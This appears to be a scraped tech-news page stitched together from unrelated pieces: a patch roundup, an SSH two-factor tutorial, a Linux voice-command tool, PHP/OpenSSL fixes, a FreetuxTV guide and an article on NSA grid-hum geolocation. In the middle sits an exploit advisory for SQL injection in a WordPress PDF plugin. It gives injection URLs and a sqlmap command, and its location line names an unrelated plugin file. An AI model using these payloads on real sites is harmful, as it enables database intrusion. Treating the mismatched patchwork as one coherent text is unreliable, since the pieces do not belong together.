Microsoft has released patches for 29 security vulnerabilities, while Adobe has released an update for Flash Player. Redmond's latest Patch Tuesday batch is composed of six bulletins, two of which have been rated as critical updates. Three others have been rated important, and the sixth is considered a moderate risk.
The critical bug fixes include:
  • Cumulative security update for Internet Explorer (2975687) Addressing 24 memory-corruption vulnerabilities, including remote-code execution flaws, in IE 6 to 11 on supported OS versions. The same holes in Windows Server editions are rated as moderate. Server 2008 for 32-bit Systems Service Pack 2, x64-based Systems Service Pack 2 and R2 for x64-based Systems Service Pack 1 are not affected, and neither are Server 2012 and 2012 R2. Some of the holes were revealed in this year's Pwn2Own hacking contest. None have otherwise been exploited in the wild.
  • Vulnerability in Windows Journal could allow remote-code execution (2975689) Addressing a remote-code execution flaw in the note-taking application, which could be exploited by specially crafted Journal files to hijack the system as the logged-in user. This affects Windows Vista, Server 2008, 7, Server 2008 R2, 8 and 8.1, Server 2012 and Server 2012 R2, and Windows RT and RT 8.1.
  • The three important bulletins, and one moderate, fix address elevation of privilege and denial of service vulnerabilities.
    There is also updated firmware for all Microsoft Surface tablets: an upgrade labeled "System Firmware Update – 7/8/2014" should be available via Windows Update, and improves various hardware-related things such as battery management and Miracast wireless display support.
    Adobe, meanwhile, has updated Flash Player for Windows, OS X and Linux systems. The company said that the fix will address three CVE-listed bugs, including a remote-code execution flaw on Flash Player for both Internet Explorer and Chrome.
    The fix is rated by Adobe as a top deployment priority on Windows, OS X and Linux. Google Chrome users will automatically receive the update upon launching the browser. Adobe is also patching the flaws in its AIR platform, though that fix is rated by the company as a lower priority.


With many high-profile password leaks nowadays, there is a lot of buzz in the industry on "multi-factor" authentication. In a multi-factor authentication system, users are required to go through two distinct authentication procedures: providing something they know (e.g., username/password), and leveraging something they have "physical" access to (e.g., one-time passcode generated by their mobile phone). This scheme is also commonly known as two-factor authentication or two-step verification.
To encourage the wide adoption of two-factor authentication, Google released Google Authenticator, an open-source application that can generate one-time passcode based on open standards (e.g., HMAP/time-based). It is available on multiple platforms including Linux, AndroidiOS. Google also offers a pluggable authentication module (PAM) for Google Authenticator, allowing it to be integrated with other PAM-enabled applications such as OpenSSH.
In this tutorial, I will describe how to set up two-factor authentication for an SSH server by integrating Google Authenticator with OpenSSH. I am going to use a Android device to generate one-time passcode. In this tutorial, you will need two things: (1) a Linux host where OpenSSH server is running, and (2) an Android device.

Install Google Authenticator on Linux

The first step is to install Google Authenticator on the Linux host where OpenSSH server is running. Follow this guide to install Google Authenticator and its PAM module on your system.
Once Google Authenticator is ready, you need to go through one-time configuration which involves creating an authentication key from this Linux host, and registering it with an Android device. This will be explained next.

Generate an Authentication Key

To start, simply run Google Authenticator on the Linux server host.
$ google-authenticator
You will see a QR code, as well as a secret key underneath it. The displayed QR code simply represents the numeric secret key. You will need either information to finalize configuration with an Android device.
Google Authenticator will ask you several questions. If you are not sure, you an answer "Yes" to all questions. The emergency scratch codes can be used to regain access to the SSH server in case you lose your Android device, and so cannot generate one-time passcode. So it's better to write them down somewhere.

Run Google Authenticator on Android

As we are going to use an Android device for two-factor authentication, you will need to install Google Authenticator app on Android. Go to Google Play to install it on Android.
When you start Google Authenticator on Android, you will see the following configuration menu.
You can choose either "Scan a barcode" or "Enter provided key" option. The first option allows you to enter the security key, simply by scanning the generated QR code. In this case, you will need to install Barcode Scanner app first. If you choose the second option, you can type the security key using Android keyboard as follows.
Once you register a secret key either way, you will see the following screen on Android.

Enable Google Authenticator on SSH Server

The final step is to integrate Google Authenticator with OpenSSH server. For that, you need to edit two files.
First, edit a PAM configuration file, and append the line below.
$ sudo vi /etc/pam.d/sshd
1
auth required pam_google_authenticator.so
Then open an SSH server config file, search for ChallengeResponseAuthentication, and enable it.
$ sudo vi /etc/ssh/sshd_config
1
ChallengeResponseAuthentication yes
Finally, restart SSH server.
On Ubuntu, Debian or Linux Mint:
$ sudo service ssh restart
On Fedora:
$ sudo systemctl restart sshd
On CentOS or RHEL:
$ sudo service sshd restart

Test Two-factor Authentication

Here is how you use two-factor authentication for SSH logins.
Run Google Authenticator app on Android to obtain one-time verification code. Once generated, a given passcode is valid for 30 seconds. Once it expires, Google Authenticator will automatically generate a new one.
Now log in to the SSH server as you normally do.
$ ssh user@ssh_server
When you are asked to enter "Verification code", type in the verification code generated by Android. After successful verification, then you can type in your SSH login password.
To conclude, two-factor authentication can be an effective means to secure password authentication by adding an extra layer of protection. You can use Google Authenticator to secure other logins such as Google account, WordPress.com, Dropbox.com, Outlook.com, etc. Whether you decide to use it or not, it's up to you, but there is a clear industry trend towards the adoption of two-factor authentication.



######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
#     Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);


$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it

#####################



source


Voice commands allows you to perform some main actions with voice. It offers this facility in 67 languages and at this moment 95 voice commands are available. It allows user to their own voice to enhance their overall Linux experience. The function of this program starts running play_stop.sh script, which will start recording your voice, and if after five seconds, or run it again, start voice recognition, for now, make one of all commands available.


voice commands


voice commands


voice commands

>> Available for Ubuntu 14.04 Trusty/14.10/13.10 Saucy/12.04 Precise/10.04 Lucid/Linux Mint 17/16/13/9/other Ubuntu derivatives
To install Voice Commands (English Version) in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:






In my test commands file was missing, if you get the same problem then proceed with these commands:







You can open Voice Command from Dash/Menu or use terminal to issue voice commands:
>>v-c , command line options

v-c -l -langTo select another, of 67 languages for recognition.
v-c -t -tryTo try any command, of default lang, or, a [-lang].
v-c -m -modTo modify the commands file, and the README file.
v-c -hShow instructions README file.
v-c --helpShow this message

You can download other languages from this page.

Voice Actions Available:

  1. SELECT_FILE << cited-text >> (select)
  2. MUSIC_START (put music | music play | music player | music | pause)
  3. MUSIC_START_SONG << cited-text >> (put music of | music of | play to | play music of)
  4. MUSIC_PLAY (play music | pause music | start music | stop music | stop music)
  5. MUSIC_NEXT (next song | next track)
  6. MUSIC_PREV (previous song | previous track)
  7. MUSIC_SHUFFLE (random music | mix | do not mix)
  8. MUSIC_REPEAT (repeat | not repeat)
  9. VIDEO_REW (delay | rewind | go back)
  10. VIDEO_FF (forward | go forward)
  11. VOLUME_DOWN (lower the volume | volume down | less volume | volume less)
  12. VOLUME_UP (increase the volume | volume up | more volume | volume more)
  13. VOLUME_MUTE (no audio | no volume | turn off audio | dumb)
  14. SEARCH << cited-text >> (search)
  15. NO_RESALT (remove highlighting | remove highlighted | no highlighting | no highlighted)
  16. TRANSLATE [from] [to] << cited-text >> (translate | translates the | translation | translates of | translate from | translated from | translation from | dictionary of the | translates the | translation of the)
  17. WRITE << cited-text >> (write | type)
  18. WRITE_CAPITAL << cited-text >> (capitalize | type capital)
  19. WRITE_CAPITAL_ALL << cited-text >> (write all uppercase | write everything capitalized)
  20. SAY_THIS << cited-text >> (say this | say)
  21. GOOGLE_SEARCH << cited-text >> (search google | internet search | meaning of | what is | search the dictionary)
  22. YOUTUBE_SEARCH << cited-text >> (search on youtube | what about | search videos | videos )
  23. WIKI_SEARCH << cited-text >> (search wiki | search wikipedia | wikipedia)
  24. WEATHER << cited-text >> (weather | climate)
  25. SEARCH_MAPS << cited-text >> (map | map search | map of | map from | where is)
  26. SAY_HI << cited-text >> (greets to | say hi to)
  27. HELLO (hello machine)
  28. WHOAMI (who i am)
  29. OPEN_FOLDER << cited-text >> (open folder)
  30. OPEN_FOLDER_OF << cited-text >> (open folder of)
  31. SAY_TIME (tell me the hour | what the time is | what time is it)
  32. SAY_DATE (date is | which day is | that date today | which day is today | tell me the date | on what date we are)
  33. DICTATION << cited-text-continuously >> (dictation mode | out dictation mode | end dictation mode)
  34. UNDO (undo)
  35. REDO (redo)
  36. DEL_LINE (delete line)
  37. FAV (add to favorite)
  38. CLOSE_TERM (close the terminal | close terminal)
  39. MAIL (open mail | open email | open mail | mail | email)
  40. COPY (copy)
  41. PASTE (paste)
  42. CUT (cut)
  43. SELECT_ALL (select all)
  44. SAVE (save | save file)
  45. SAVE_AS (save as | save page as)
  46. FOLDER (create folder | new folder)
  47. MINIMISE (minimize)
  48. MAXIMISE (maximize)
  49. FULLSCREEN (full screen | fullscreen)
  50. TAB (key tab | tabulation | tab)
  51. ESC (escape)
  52. MENU (main menu | open main menu)
  53. ACTIONS_MENU (menu | open menu | close menu)
  54. CLOSE (close program | exit)
  55. CLOSE_WIN (close window)
  56. ZOOM_OUT (ward | shrink | decrease | zoom less)
  57. ZOOM_IN (approximate | enlarge | raise | zoom more)
  58. ZOOM_RESET (normal size | zero zoom)
  59. TOUCH_ON_OFF (turn off touchpad | turn on touchpad | touchpad)
  60. BACK (over | back)
  61. ADVANCE (move | forward)
  62. RIGHT (right)
  63. LEFT (left)
  64. DOWN (down)
  65. UP (go up)
  66. PAGE_DOWN (page down)
  67. PAGE_UP (page up)
  68. HOME_PAGE (top of page | go to top of page | go to the top)
  69. END_PAGE (end of page | go to end of page | go to the end)
  70. HOME (top of)
  71. END (the end)
  72. SCROLL_DOWN (run page down | run down)
  73. SCROLL_UP (run page up | run up)
  74. DELETE (delete)
  75. ENTER (open | execute | enter)
  76. NEW_WINDOW (new window)
  77. CHANGE_TAB (window move | go to window | switch to window | window | move tab | go to tab | switch to tab)
  78. CLOSE_TAB (close tab)
  79. BROWSER (browser | open browser | internet)
  80. FILE_MANAGER (nautilus | file explorer | open nautilus | open file explorer)
  81. TERMINAL (open the console | open terminal | terminal opens | open the terminal)
  82. EXECUTE (launch command | run command)
  83. BATTERY (battery | battery status | battery charge)
  84. TEXT_EDITOR (text editor | open text editor | launch text editor | new text)
  85. SCREENSHOT (screenshot | catch)
  86. ALARM << cited-numbers [days] [hours] [minutes] [seconds]>> (alarm | start alarm at)
  87. LOG_OFF (logout | system logout)
  88. BRIGHTNESS_UP (raise the brightness | brighten up | shine up | up brightness | increase brightness)
  89. BRIGHTNESS_DOWN (lower the brightness | decrease brightness | brightness down | shine down | decrease brightness)
  90. POWER_OFF (shut down the system | turn off the machine | turn off the computer | turn off computer | power off)
  91. CALCULATER (calculator)
  92. TAKE_PICTURE (photo | take a picture)
  93. TAKE_VIDEO (record | record video | record a video)
  94. OPEN_FILE (open file | open a new file)
  95. OFFICE << cited-text [ writer, calc, impress, draw, math ] >> (open new document | open new document of | create new document | create new document of | create new | open new) Writer (text) Calc (calc) Impress (presentation | page | web) Draw (drawing | graphic) Math (formula | math)
  96. RETRY (retry command | repeat command | try again the command | retry | try again)


The PHP Group has released new versions of the popular scripting language that fix a number of bugs, including two in OpenSSL. The flaws fixed in OpenSSL don’t rise to the level of the major bugs such as Heartbleed that have popped up in the last few months. But PHP 5.5.14 and 5.4.30 both contain fixes for the two vulnerabilities, one of which is related to the way that OpenSSL handles timestamps on some certificates, and the other of which also involves timestamps, but in a different way.
“This piece of code is the part of a backwards UTCTime parser. It moves 2 positions to the left, and converts those two characters to an int,” the bug report says for one of the OpenSSL flaws says.
“However, certs with a validity past 2050 contain GeneralizedTime formatted timestamps allowing 4 characters in the year field instead of the UTCTime this function parses (badly).”
The second OpenSSL vulnerability lies in the way that PHP handles certain data types for timestamps. A specially crafted certificate can cause errors.
“The cert was generated by a Windows 2003 server. Note the “valid to” time is “Jun 21 15:59:11 2109 GMT”. In openssl.c PHP checks for V_ASN1_UTCTIME, but triggers the warning when the time is V_ASN1_GENERALIZEDTIME. According to a brief search of the openssl source both are valid expressions of a valid from/to time,” the report says.
Along with the two OpenSSL vulnerabilities fixed in PHP 5.5.14 and 5.4.30, there are a number of other bugs fixed in the releases, many of which are not security related.



Wanted to watch TV on your Linux box, and preferably for free? FreetuxTV is an online TV player which was originally developed to let the subscribers of French ISPs (e.g., Free, Orange, SFR) watch live TV channels streamed by those ISPs. Over time, FreetuxTV has added additional free online TV, web radio and webcam channels to the list, and now the (crowdsourced) FreetuxTV database carries channels in over 50 different languages.
While FreetuxTV channels are not premium quality in any means (and for good reason), it can still be a good option especially for expats who typically don't have the luxury to watch live TV programs or radio of their home countries. In this tutorial, I am going to describe how to watch free online TV on Linux using FreetuxTV.

Install FreetuxTV on Linux

First, you need to install VLC as FreetuxTV uses VLC backend to play TV or radio channels. Refer to this tutorialto install VLC on your Linux system.
After that, follow the distro-specific guidelines below to compile and install FreetuxTV. The latest FreetuxTV is built with GTK3-based GUI.
To install FreetuxTV on Debian, Ubuntu or Linux Mint:
$ wget https://freetuxtv.googlecode.com/files/freetuxtv-0.6.6.tar.gz
$ tar xvfvz freetuxtv-0.6.6.tar.gz
$ sudo apt-get install gcc make autoconf automake intltool libtool gettext libgtk-3-dev libdbus-glib-1-dev libsqlite3-0 libsqlite3-dev libcurl3 libcurl4-openssl-dev libvlc-dev libnotify-dev
$ cd freetuxtv-0.6.6
$ ./autogen.sh
$ ./configure --prefix=/usr/local
$ make
$ sudo make install
To install FreetuxTV on Fedora:
$ wget https://freetuxtv.googlecode.com/files/freetuxtv-0.6.6.tar.gz
$ tar xvfvz freetuxtv-0.6.6.tar.gz
$ sudo yum install vlc-devel dbus-glib-devel libnotify-devel libcurl-devel intltool gtk3-devel sqlite-devel
$ cd freetuxtv-0.6.6
$ ./autogen.sh
$ ./configure --prefix=/usr/local
$ make
$ sudo make install

Watch Online TV with FreetuxTV

To launch FreetuxTV, simply run the command:
$ freetuxtv
The first time you run FreetuxTV, you will be asked to add channel group(s) you are intrested in. The channels are categorized by languages.
Once you add one or more channel groups, it will appear in the left sidebar of FreetuxTV.
To watch a TV channel, simply click on the corresponding icon.

Record Live TV with FreetuxTV

Since live broadcasting has varying time schedules across different countries in different timezones, FreetuxTV is also designed to allow you to record live TV or radio at scheduled time slots, so you can enjoy them later at your convenience.
To record the current channel, click on the record icon at the bottom. It will pop up a window where you can set the recording period.
Once you start recording, you can check the status of recording by clicking on "Recordings" tab on the left.
You can choose among different transcoding formats in the Preferences window.



Forensics and industry experts have cast doubt on an alleged National Security Agency capability to locate whistle blowers appearing in televised interviews based on how the captured background hum of electrical devices affects energy grids.
Divining information from electrified wires is a known technique: Network Frequency Analysis (ENF) is used to prove video and audio streams have not been tampered with.
The technique works by analysing the nearly inaudible 50 Hertz energy hum generated by power grids which is inadvertently captured by most audio recording devices. Investigators could strip away layers of audio until the bare hum remains. That hum can then be scrutinised for unnatural variations.
ENF analysis became topical this week when German outlet Heute.de reported an un-named former NSA staffer claimed the agency has used it to determine the physical location where a recording of TV interviews took place by matching captured energy hums with those previously recorded across the grid.
NSA operatives could therefore guess at a whistleblower's location.
Technology to conduct ENF is not exotic. Bandpass filters can detect variations in the 50Hz hum which would detect dips and rises as small as 0.001 Hz over 10 seconds.
That it is possible to geolocate variations in grid hum, which Heute.de reports the NSA and CIA can do, is more novel.
But experts are dubious the reports are correct.
"Let me start by saying that in principle it could well be possible to use ENF to determine the location a recording was made as well as the time it was made," Philip Harrison, an ENF forensics veteran of 18 years based in London told The Register.
"It's possible that there are some other aspects of the signal that vary by location that haven't been discovered yet, or perhaps the NSA have discovered them."
Harrison had performed ENF to verify audio recording presented as evidence in court showing that a undercover police recording of an illegal weapons deal had not been tampered with. In 2010, ENF was used in a high profile murder case in the UK. Blighty's Metropolitan Police Service have stockpiled a comprehensive database of electrical grid frequencies since 2005 to help with further cases.
Vulture South contacted Harrison and others about the ex-NSA agent's claims. Harrison saw three problems that were likely intractable for anyone other than the seemingly superhuman hackers at the NSA.
"Firstly," Harrison said, "the NSA would need to know over what geographic area the specific type of variation occurred".
Research published last month by the University of Porto, Portugal, (Real-Time Monitoring of ENF and THD Quality Parameters of the Electrical Grid in Portugal) examined local variation in the nation's power grid. It found fundamental differences in the structure of the harmonics of the 50 Hz which could be detected because Total Harmonic Distortion was strongly affected by local factors and had as a result little geographical consistency.
That research considered only a handful of locations meaning it was unclear how the features could vary between sub-stations or power stations, Harrison said. The NSA could know of other signal aspects that varied according to location, but that was speculative.
The second problem was the need to log ENF values and the secret signal sauce that allowed location to be determined. "This could mean hundreds or thousands of logging devices in a country if you want to be able to locate a recording accurately," he said.
The problem was a prodigious one because of the huge amount of frequency variation in local power grids. All manner of electrical devices could cause a dip or spike in neighbouring networks.
"You would need a tap on every one of thousands of transformers," said Ian Appleby, a former veteran of the Australian energy and defence sectors who maintained a comprehensive knowledge of electronics, but not of ENF. "In the industrial area where I used to be, my UPS (uninterruptible power supply) would freak out when nearby commercial places shut down causing a spike in frequency."
He doubted the feasibility of mapping a whole power grid considering these immense variables.
A third problem relates to the hit and miss process of extracting the relevant data from captured recordings.
"From my experience of casework this is the hardest part," Harrison said. "It's not always easy to get out the variation in 50 Hz since it is at such a low level in the signal, let alone trying to get more information out about the harmonics or some other aspect of the signal."
"So while it might be able to work in principle, actually applying it to a real-world recording could be a lot harder."
The audio and video equipment used to record whistle blowers could be identified, according to NSW-based Brian Stokes who had a background in the field but not ENF. He and other engineers agreed with Appleby's remarks.
"The possibilities of characterising the recording equipment such as microphone, input amplifier, etcetera are rather good, but the likelihood of determining the geographical location of the recording based upon artifacts of the mains supply, given the levels of filtration in DC supply design, sounds improbable."
If the NSA did have the technology, it was bad news for whistleblowers. The Heute.desource said they could nail a whistle blower in less than three weeks, even faster if they spoke at a monitored journalist's favourite haunt.



Your Location

IP